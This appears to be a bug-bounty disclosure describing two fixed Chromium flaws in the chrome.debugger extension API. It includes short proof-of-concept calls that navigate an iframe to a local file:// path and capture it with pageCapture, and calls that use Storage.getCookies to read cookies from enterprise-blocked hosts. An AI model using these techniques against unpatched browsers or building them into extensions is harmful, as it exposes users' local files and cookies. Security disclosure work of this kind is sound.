The Chrome extension chrome.debugger https://developer.chrome.com/docs/extensions/reference/api/debugger API implies <all_urls> permission but should not grant access to the user’s file system or bypass enterprise policies.
However, it’s a very powerful protocol by design with lots of features https://chromedevtools.github.io/devtools-protocol/
‘Page.navigate’ could navigate iframes to file:// when not enabled (Awarded $3000)
Extensions with both pageCapture and debugger permissions could read local file contents.
This is because it’s possible to use Page.navigate to navigate an iframe to file:// when “Allow access to file URLs” is disabled, exposing the file’s contents to the pageCapture API.
chrome.debugger.attach({tabId: <TARGET>}, '1.3', console.log);
chrome.debugger.sendCommand({tabId: <TARGET>}, 'Page.navigate', {frameId: <FRAME ID AS SEEN FROM EVENTS>, url: 'file:///d:/demo.txt'}, console.log);
chrome.pageCapture.saveAsMHTML({tabId: <TARGET>}, console.log);
This issue was fixed in https://issues.chromium.org/40060173
Features bypass the runtime_blocked_hosts cookie protection (Awarded $3000)
Extensions were able to get cookies from a runtime_blocked_host using the chrome.debugger API via Storage.getCookies https://chromedevtools.github.io/devtools-protocol/tot/Storage/#method-getCookies and other protocol features.
Setup
- Add host to
runtime_blocked_hostshttps://chromeenterprise.google/policies/?policy=ExtensionSettings - For Windows 10 using registry at
HKEY_CURRENT_USER\SOFTWARE\Policies\Google\Chromecreate string with nameExtensionSettingsand content of{ "*": { "runtime_blocked_hosts": [ "*://example.org" ] } } - The policy should be listed at
chrome://policy/; you may need to reload. - Create cookie at https://example.org like
document.cookie = 'foo=foo';
Exploit
Using a browser extension with the debugger permission.
- Get
tabIdlike withchrome.tabs.query({active: true}); - Attach to a tab with
await chrome.debugger.attach(target, '1.3'); - Run
Storage.getCookieswithawait chrome.debugger.sendCommand({tabId: <tabId>}, 'Storage.getCookies');. It should return the cookie from the runtime blocked host.